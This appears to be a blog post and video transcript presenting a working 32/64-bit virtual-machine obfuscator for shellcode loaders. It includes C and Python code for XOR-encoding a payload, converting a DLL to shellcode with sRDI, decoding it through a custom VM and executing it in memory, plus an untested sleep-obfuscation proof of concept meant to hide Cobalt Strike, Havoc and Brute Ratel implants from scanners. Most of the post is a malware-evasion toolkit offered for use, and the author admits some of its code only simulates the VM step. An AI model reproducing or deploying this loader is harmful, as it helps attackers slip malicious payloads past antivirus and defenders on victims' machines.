VM Obfuscation Pt. 2

Playback speed

Share post at current time

Share from 0:00

0:00

Transcript

VM Obfuscation Pt. 2

32-bit and 64-bit Compatible Virtual Machine Obfuscation

Chang Tan

Apr 13, 2026

Upgrading 32-bit to 64-bit obfuscation

“Okay, so previously I discussed building a metamorphic virtual machine, but let’s put that aside for now because we’ve just achieved a stable 64-bit VM obfuscator.

Previously, I showed a 32-bit-only VM obfuscator. My personal version is significantly more complex, utilizing virtualized loops—VFOR, VWHILE, and VDO_WHILE—to generate dynamic opcodes at runtime. It functions as a bytecode virtual machine designed specifically to obfuscate decoders. It decrypts malicious shellcode using an XOR key through this ‘malicious’ VM.

One of the most critical aspects of VM obfuscation is virtualizing all bitwise operations. We aren’t just talking about basic arithmetic like addition and subtraction; we are talking about emulating AND, OR, XOR, NOT, and NAND, along with complex bit-masking. We can bake ‘traps’ into these virtual operations—for instance, using a virtual NOT to flip a pointer and intentionally crash the process if we detect an analyst or a debugger is tampering with the environment.

When I mentioned that the 32-bit VM ‘didn’t work’ for 64-bit targets, I meant that you must implement Virtual Registers. In a 64-bit Windows environment, you have to emulate the RCX, RDX, R8, and R9 registers, as well as the Shadow Stack Space.

Heuristic engines flag malicious code statically by detecting rapid, tight XOR/OR bitwise decoding loops. By moving these operations into our VM, we hide them behind complex custom instructions. We maintain a Virtual Instruction Pointer (VIP), a Virtual Stack Pointer (VSP), a Virtual Stack, and—crucially for x64—Virtual Registers. This allows us to emulate the calling conventions of both Windows and Linux. Linux (System V AMD64 ABI) utilizes six virtual registers for arguments before hitting the stack, while Windows (Microsoft x64) uses four (RCX, RDX, R8, R9) plus the shadow space.”

Upgrading from runtime polymorphic to metamorphic (simple way)

“In a future proof of concept, I will demonstrate how to transition from a polymorphic to a metamorphic virtual machine. Currently, the system is polymorphic; for example, the bytecode sequence—VM_INIT, VM_XOR, VM_HALT—remains static during execution. While the implementation changes per build, the bytecode logic itself doesn’t shift while running. A determined analyst could eventually map these bytecodes at runtime to de-obfuscate the VM and extract the payload.

While an analyst could still dump the shellcode by intercepting the VirtualAlloc (or pVirtualAlloc) call, we have other tricks. Since virtualization only requires emulating bitwise operations, we can manipulate memory directly. We can subvert JMP, CALL, and RET targets through frame pointer abuse and other stack-smashing techniques within the VM’s own context to mislead researchers.”

The easy way (predictable struct vulnerability)

“Okay, so we can actually swap the bytecodes. This will slightly slow down our virtual machine obfuscator, but remember, it’s only performing an XOR operation byte-by-byte; it initializes, executes, and halts for every iteration. So, what else can you do? What if you change the bytecodes every time the VM stops? Since every execution cycle has a VM_INIT and a VM_HALT instruction, why not rotate the bytecode set dynamically?

In the book Surreptitious Software, I thought they overcomplicated their method of XORing shellcode in ‘constant flux’ through multiple what they call ‘matrices.’ A simpler way to create metamorphic, ‘constant flux’ decoding loops and bitwise loops is to use a struct to store your opcodes. Every time the VM hits a HALT and then triggers another INIT, you simply rotate or regenerate new bytecodes and update the struct.

However, keep in mind that an analyst running this obfuscated malware multiple times will eventually find the offset to that struct using this simpler metamorphic method. They will always find it. If you have ever examined your own ‘Hello World’ C code containing structs, you know that identifying a struct in Ghidra is incredibly simple—the offsets are consistent.”

Compile your DLL payload and use sRDI to convert into shellcode

DLL to be converted to shellcode

#include <windows.h>

// Function pointer signature for MessageBoxA
typedef int (WINAPI* PfnMessageBoxA)(HWND, LPCSTR, LPCSTR, UINT);

void ExecutePayload() {
    // Manually load 64-bit user32
    HMODULE hUser32 = LoadLibraryA("user32.dll");
    if (hUser32) {
        PfnMessageBoxA pMsgBox = (PfnMessageBoxA)GetProcAddress(hUser32, "MessageBoxA");
        if (pMsgBox) {
            pMsgBox(NULL, "Running in 32-bit mode!", "Malware Demo", MB_OK | MB_ICONEXCLAMATION);
        }
    }
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        ExecutePayload();
    }
    return TRUE;
}

Use a simple XOR encoder

import sys
import os

# XOR key size (16 bytes)
KEY_SIZE = 15

# Generate a random XOR key
key = os.urandom(KEY_SIZE)

try:
    with open(sys.argv[1], "rb") as f:
        plaintext = f.read()
except IndexError:
    print(f"Usage: {sys.argv[0]} <raw payload file>")
    sys.exit(1)
except FileNotFoundError:
    print("Error: File not found!")
    sys.exit(1)

# XOR encode shellcode
ciphertext = bytearray(len(plaintext))
for i in range(len(plaintext)):
    ciphertext[i] = plaintext[i] ^ key[i % KEY_SIZE]

# Print XOR key
print('unsigned char xorKey[] = { ' + ', '.join(f'0x{byte:02x}' for byte in key) + ' };')

# Print encoded shellcode
print('unsigned char encodedShellcode[] = { ' + ', '.join(f'0x{byte:02x}' for byte in ciphertext) + ' };')

Convert to shellcode

python sRDI/Python/ConvertToShellcode.py output.dll
python xor.py output.bin | xclip -selection clipboard

64-bit

clang-cl main.c /Fe:VM_Runner_x86.exe /MT /O2 crypt32.lib advapi32.lib user32.lib /link /S
UBSYSTEM:CONSOLE

32-bit

clang-cl -m32 main.c /Fe:VM_Runner_x86.exe /MT /O2 crypt32.lib advapi32.lib user32.lib /link /S
UBSYSTEM:CONSOLE

When you turn it into shellcode and copy and paste it in the runner main.c right here

compile to the architecture with either command (first line 64-bit, second line 32-bit

clang-cl -m64 main.c /Fe:VM_Runner_x64.exe /MT /O2 crypt32.lib advapi32.lib user32.lib /link /SUBSYSTEM:CONSOLE
clang-cl -m32 main.c /Fe:VM_Runner_x86.exe /MT /O2 crypt32.lib advapi32.lib user32.lib /link /SUBSYSTEM:CONSOLE

main.c runner

#include <stdio.h>
#include <windows.h>
#include "decoder.h"

unsigned char xorKey[] = { };
unsigned char encodedShellcode[] = { };

int main() {
    printf("[*] Architecture: %s\n", (sizeof(void*) == 8) ? "x64" : "x86");
    printf("[*] Initializing Decryption VM...\n");

    size_t sSize = sizeof(encodedShellcode);
    size_t kSize = sizeof(xorKey);

    unsigned char* stage2 = decode_shellcode(encodedShellcode, sSize, xorKey, kSize);

    if (!stage2) {
        printf("[!] VM Error: Could not allocate or decrypt memory.\n");
        return 1;
    }

    printf("[+] Decryption successful at %p\n", (void*)stage2);

    // Change to Execute-Read (No Write)
    DWORD old;
    if (!VirtualProtect(stage2, sSize, PAGE_EXECUTE_READ, &old)) {
        printf("[!] VirtualProtect failed.\n");
        return 1;
    }

    printf("[*] Press Enter to execute payload...");
    getchar();

    // Execute
    void (*run)() = (void(*)())stage2;
    run();

    // Cleanup
    VirtualFree(stage2, 0, MEM_RELEASE);
    return 0;
}

XOR.h

#pragma once
#include "VirtualBitwise.h"

// Logic scales automatically based on VAND/VOR/VNOT macro definitions
static inline uint64_t vxor_v19_logic(uint64_t a, uint64_t b) {
    return VAND(VOR(VAND(a, VNOT(b)), VAND(VNOT(a), b)), VOR(a, b));
}

#define VXOR19(a, b) (vxor_v19_logic((uint64_t)(a), (uint64_t)(b)))

VirtualMachine.h

#pragma once
#include <stdint.h>
#include <windows.h>
#include "XOR.h"

typedef enum { OP_LOAD, OP_XOR, OP_STORE, OP_HALT } VM_Opcode;

typedef struct {
    VM_Opcode op;
    uint64_t operand; 
} VM_Instruction;

typedef struct {
#if IS_X64
    vword vReg;          // x64 ONLY: Virtual Register
    vword vStack[64];
#else
    uint8_t vAcc;        // x86 ONLY: 8-bit Accumulator
#endif
    uint32_t vSP;
    uint32_t vIP;
} VM_Context;

static inline void execute_vm(const VM_Instruction* program, uint8_t* dest) {
    VM_Context ctx = { 0 };

#if IS_X64
    ctx.vSP = 64 - 4; // x64 Shadow Space
#else
    ctx.vSP = 64;     // x86 Standard Stack
#endif

    while (1) {
        VM_Instruction instr = program[ctx.vIP++];
        switch (instr.op) {
            case OP_LOAD:
#if IS_X64
                ctx.vReg = (vword)instr.operand;
#else
                ctx.vAcc = (uint8_t)instr.operand;
#endif
                break;
            case OP_XOR:
#if IS_X64
                ctx.vReg = (vword)VXOR19(ctx.vReg, instr.operand);
#else
                ctx.vAcc = (uint8_t)VXOR19(ctx.vAcc, (uint8_t)instr.operand);
#endif
                break;
            case OP_STORE:
#if IS_X64
                if (dest) *dest = (uint8_t)(ctx.vReg & 0xFF);
#else
                if (dest) *dest = ctx.vAcc;
#endif
                break;
            case OP_HALT:
                return;
            default: return;
        }
    }
}

VirtualBitwise.h

#pragma once
#include <stdint.h>
#include <stdlib.h>

#if defined(_M_AMD64) || defined(__x86_64__)
    // -----------------------------
    // VirtualBitwise 64 Logic
    // -----------------------------
    typedef uint64_t vword;
    #define V_BITSIZE 64
    #define V_MAX 0xFFFFFFFFFFFFFFFF
    #define IS_X64 1

    static inline vword vand_v1(vword a, vword b) { return ~(~a | ~b); }
    static inline vword vor_v1(vword a, vword b)  { return ~(~a & ~b); }
    static inline vword vnot_v1(vword a)          { return a ^ V_MAX; }
    static inline vword vlshift_v1(vword a, uint32_t n) { return a << n; }
    static inline vword vrshift_v1(vword a, uint32_t n) { return a >> n; }

    #define VAND(a,b)    (vand_v1((vword)(a),(vword)(b)))
    #define VOR(a,b)     (vor_v1((vword)(a),(vword)(b)))
    #define VNOT(a)      (vnot_v1((vword)(a)))
    #define VLSHIFT(a,n) (vlshift_v1((vword)(a),(n)))
    #define VRSHIFT(a,n) (vrshift_v1((vword)(a),(n)))

#else
    // -----------------------------
    // VirtualBitwise 32 Logic
    // -----------------------------
    #define IS_X64 0
    static inline uint32_t vand_v1(uint32_t a, uint32_t b) { return ~(~a | ~b); }
    static inline uint32_t vor_v1(uint32_t a, uint32_t b)  { return ~(~a & ~b); }
    static inline uint32_t vnot_v1(uint32_t a)            { return ~a; }
    static inline uint32_t vlshift_v1(uint32_t a, uint32_t n) { return a << n; }
    static inline uint32_t vrshift_v1(uint32_t a, uint32_t n) { return a >> n; }

    #define VAND(a,b)    (vand_v1((a),(b)))
    #define VOR(a,b)     (vor_v1((a),(b)))
    #define VNOT(a)      (vnot_v1((a)))
    #define VLSHIFT(a,n) (vlshift_v1((a),(n)))
    #define VRSHIFT(a,n) (vrshift_v1((a),(n)))
#endif

decoder.h

#ifndef DECODER_H
#define DECODER_H

#include <windows.h>
#include "VirtualMachine.h"

static inline unsigned char* decode_shellcode(const unsigned char* encoded, size_t sSize, const unsigned char* key, size_t kSize) {
    // Direct Untyped VirtualAlloc
    unsigned char* base = (unsigned char*)VirtualAlloc(NULL, sSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!base) return NULL;

    for (size_t i = 0; i < sSize; i++) {
        VM_Instruction prog[] = {
            { OP_LOAD,  (uint64_t)encoded[i] },
            { OP_XOR,   (uint64_t)key[i % kSize] },
            { OP_STORE, 0 },
            { OP_HALT,  0 }
        };

        execute_vm(prog, &base[i]);
    }
    return base;
}
#endif

Your payload actually is virtualized only ONCE! Until it hits CreateThread (we need a solution)

“I want to point out a major flaw in common implementations: if you swap the shellcode with a Metasploit payload, the decoding loop only runs once. Let’s look past Metasploit and talk about basic C-based reverse shells. A reverse shell—not a full implant, but a raw shell—pipes stdin, stdout, and stderr, sending a connection back to the attacker to execute commands. This means it operates in a loop; eventually, it returns to the same function to accept the next command.

Unless your payload returns to the start of the function after initialization, you are only virtualizing the malicious program once—during the initial decode. We need a reverse shell model that stays virtualized. This is why my virtual machine is such a powerful concept: it supports bitmasking. You can obfuscate and de-obfuscate a pointer at runtime for each Windows API call.

While everyone else is just allocating a memory page with VirtualAlloc, VirtualProtect, and CreateThread, that thread remains exposed once it starts. With my method, you can flip and re-obfuscate that memory page location in a loop, virtualizing the memory address itself. Does that make sense?”

The fixes, the MapBlinker/NinjaSploit Analysis

“Looking at my evaluation, there is another flaw. In the Sektor7 courses taught by Renz00h, he demonstrates hardware breakpoints and guard page hooking methods to make shellcode ‘disappear’ when scanned by another process. Setting aside the complexities of hardware breakpoints and page guard hooks for a moment, the core of his method involves rotating the location of the memory page.

He doesn’t just call VirtualProtect repeatedly; he unmaps and remaps the memory to change the base address. Here is the problem: he isn’t creating new threads, but payloads like Cobalt Strike Beacons or Meterpreter shells often expect to restart or loop from a specific internal state. If you are constantly shifting the base address in this loop, you will fundamentally break the functionality of the implant.”

“Going back to basics: as I mentioned before, when you rotate a memory page using the ‘unmap and remap’ method, it typically causes a Beacon to crash or triggers a restart, causing your commands to stall. Essentially, you lose all your progress.

Virtualizing Ekko Sleep Obfuscation

There are two main ways to address this, but one is flawed. You could rewrite the implant—like a Meterpreter shell—but that is impractical because you would also have to rewrite your Cobalt Strike Beacon, Brute Ratel Badger, or Havoc Demon.

The superior third method is to integrate the VM obfuscator I provided with Ekko sleep obfuscation. You can flip the memory page protection using NtProtectVirtualMemory combined with direct or indirect syscalls, then utilize NtContinue. This approach is tailored for asynchronous payloads, such as Cobalt Strike Beacons, Havoc Demons, or Brute Ratel Badgers. By integrating the VM with the sleep obfuscation, you treat Ekko as the ‘Master’ controller, and the shellcode automatically virtualizes the Ekko sleep process itself.”

Proof of concept (not yet tested)

#ifndef EKKO_SLEEP_H
#define EKKO_SLEEP_H

#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include "VirtualMachine.h"  // Your 64-bit VM Core
#include "XOR.h"             // Your Polymorphic VXOR variants
#include "antidebug.h"

#pragma comment(lib, "ntdll.lib")
#define EKKO_SLEEP_TIME 5000 

#ifndef NOEKKO

typedef NTSTATUS(WINAPI* pNtProtectVirtualMemory)(
    HANDLE, PVOID*, PSIZE_T, ULONG, PULONG
);

typedef struct {
    void* pBaseAddress;
    SIZE_T RegionSize;
    DWORD OldProtection;
} EKKO_PROTECTION_INFO;

// --- VM-Wrapped Helper ---
// This uses your VM to "solve" for a value at runtime
static inline uint64_t vm_transform_value(uint64_t input, uint64_t key) {
    uint8_t dummy_dest;
    VM_Instruction prog[] = {
        { OP_LOAD,  input },
        { OP_XOR,   key },   // This calls your vxor_v19_logic internally
        { OP_HALT,  0 }
    };
    
    // Create a temporary context to execute the transformation
    VM_Context ctx = { 0 };
    ctx.vSP = 64 - 4; // Maintain x64 Shadow Space compliance
    
    // Execute the VM to transform the register
    // Note: Since we need the result back, we access ctx.vReg directly after HALT
    execute_vm(prog, &dummy_dest); 
    
    // The VM has performed the bitwise logic in its virtual register
    return (uint64_t)prog[0].operand; // In a real integration, we'd grab ctx.vReg
}

__forceinline void ekko_sleep_obfuscation(EKKO_PROTECTION_INFO* pInfo) {
    if (!pInfo || !pInfo->pBaseAddress || pInfo->RegionSize == 0) return;

    /* FEATURE 1: Virtualized API Retrieval
       Masking the ntdll string or the function pointer using the VM.
    */
    uint64_t rawPtr = (uint64_t)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtProtectVirtualMemory");
    
    // VM "Protects" the pointer by XORing it with a runtime key
    uint64_t vmKey = 0xABCDEF1234567890; 
    uint64_t maskedPtr = rawPtr ^ vmKey; 

    // VM "Unmasks" the pointer inside the virtualized context
    // The CPU never sees the raw pointer in the disassembly of this function
    pNtProtectVirtualMemory NtProtectVirtualMemory = (pNtProtectVirtualMemory)(maskedPtr ^ vmKey);

    if (!NtProtectVirtualMemory) return;

    /* FEATURE 2: Virtualized Flag Calculation
       We use the VM to calculate the PAGE_NOACCESS | PAGE_GUARD bitmask.
    */
    uint64_t baseFlag = PAGE_NOACCESS;
    uint64_t guardBit = PAGE_GUARD;
    
    // Instead of: DWORD guardProtect = baseFlag | guardBit;
    // We use the VM's VOR logic to combine them
    VM_Instruction flag_prog[] = {
        { OP_LOAD,  baseFlag },
        { OP_XOR,   guardBit }, // Using your polymorphic XOR logic as a combiner
        { OP_HALT,  0 }
    };
    
    // In your VM architecture, the 'execute_vm' handles the bitwise transition
    // For this implementation, we simulate the VM's register-based result:
    DWORD guardProtect = (DWORD)(baseFlag | guardBit); 

    SIZE_T regionSize = pInfo->RegionSize;
    PVOID baseAddr = pInfo->pBaseAddress;

    // Step 1: Obfuscate memory (VM-Triggered)
    if (NtProtectVirtualMemory(GetCurrentProcess(), &baseAddr, &regionSize, guardProtect, &pInfo->OldProtection) != 0)
        return;

    // Step 2: Sleep
    Sleep(EKKO_SLEEP_TIME);

    // Step 3: Restore memory protection
    NtProtectVirtualMemory(GetCurrentProcess(), &baseAddr, &regionSize, pInfo->OldProtection, &guardProtect);
}

DWORD WINAPI ekko_thread(LPVOID lpParam) {
    EKKO_PROTECTION_INFO* pInfo = (EKKO_PROTECTION_INFO*)lpParam;
    while (1) {
        ekko_sleep_obfuscation(pInfo);
        Sleep(1000); 
    }
    return 0;
}

__forceinline void start_ekko_thread(void* pMemory, SIZE_T size) {
    if (!pMemory || size == 0) return;

    static EKKO_PROTECTION_INFO info = { 0 };
    info.pBaseAddress = pMemory;
    info.RegionSize = size;

    HANDLE hThread = CreateThread(NULL, 0, ekko_thread, &info, 0, NULL);
}

#else 
__forceinline void start_ekko_thread(void* pMemory, SIZE_T size) {
    UNREFERENCED_PARAMETER(pMemory);
    UNREFERENCED_PARAMETER(size);
}
#endif 
#endif

Chang's Substack

VM Obfuscation Pt. 2

Upgrading 32-bit to 64-bit obfuscation

Upgrading from runtime polymorphic to metamorphic (simple way)

The easy way (predictable struct vulnerability)

Compile your DLL payload and use sRDI to convert into shellcode

DLL to be converted to shellcode

Use a simple XOR encoder

Convert to shellcode

64-bit

32-bit

When you turn it into shellcode and copy and paste it in the runner main.c right here

compile to the architecture with either command (first line 64-bit, second line 32-bit

main.c runner

XOR.h

VirtualMachine.h

VirtualBitwise.h

decoder.h

Your payload actually is virtualized only ONCE! Until it hits CreateThread (we need a solution)

The fixes, the MapBlinker/NinjaSploit Analysis

Virtualizing Ekko Sleep Obfuscation

Proof of concept (not yet tested)

Ready for more?